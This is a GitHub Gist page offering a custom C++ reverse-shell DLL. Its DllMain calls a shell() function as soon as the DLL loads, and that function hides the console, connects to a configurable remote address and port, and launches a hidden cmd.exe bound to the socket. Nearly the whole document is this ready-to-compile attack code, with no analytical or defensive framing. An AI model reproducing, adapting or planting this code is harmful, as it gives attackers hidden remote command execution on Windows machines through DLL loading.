-
-
Save xct/acacd58278f0448aeb1127aae41db1fd to your computer and use it in GitHub Desktop.
A custom cpp reverse shell dll
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-----------------------------------------------------------shell.h----------------------------------------------------------- | |
void shell(); | |
-----------------------------------------------------------pwn.cpp----------------------------------------------------------- | |
#include <Windows.h> | |
#include "shell.h" | |
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdReason, LPVOID lpReserved){ | |
switch(fwdReason){ | |
case DLL_PROCESS_ATTACH: | |
shell(); | |
case DLL_PROCESS_DETACH: | |
break; | |
} | |
} | |
-----------------------------------------------------------shell.cpp----------------------------------------------------------- | |
#include <stdio.h> | |
#include <string.h> | |
#include <process.h> | |
#include <winsock2.h> | |
#include <ws2tcpip.h> | |
#pragma comment(lib, "Ws2_32.lib") | |
#define REMOTE_ADDR "" | |
#define REMOTE_PORT "" | |
void shell() | |
{ | |
FreeConsole(); | |
WSADATA wsaData; | |
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); | |
struct addrinfo *result = NULL, *ptr = NULL, hints; | |
memset(&hints, 0, sizeof(hints)); | |
hints.ai_family = AF_UNSPEC; | |
hints.ai_socktype = SOCK_STREAM; | |
hints.ai_protocol = IPPROTO_TCP; | |
getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result); | |
ptr = result; | |
SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL); | |
connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); | |
STARTUPINFO si; | |
PROCESS_INFORMATION pi; | |
ZeroMemory(&si, sizeof(si)); | |
si.cb = sizeof(si); | |
ZeroMemory(&pi, sizeof(pi)); | |
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; | |
si.wShowWindow = SW_HIDE; | |
si.hStdInput = (HANDLE)ConnectSocket; | |
si.hStdOutput = (HANDLE)ConnectSocket; | |
si.hStdError = (HANDLE)ConnectSocket; | |
TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE"); | |
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); | |
WaitForSingleObject(pi.hProcess, INFINITE); | |
CloseHandle(pi.hProcess); | |
CloseHandle(pi.hThread); | |
WSACleanup(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment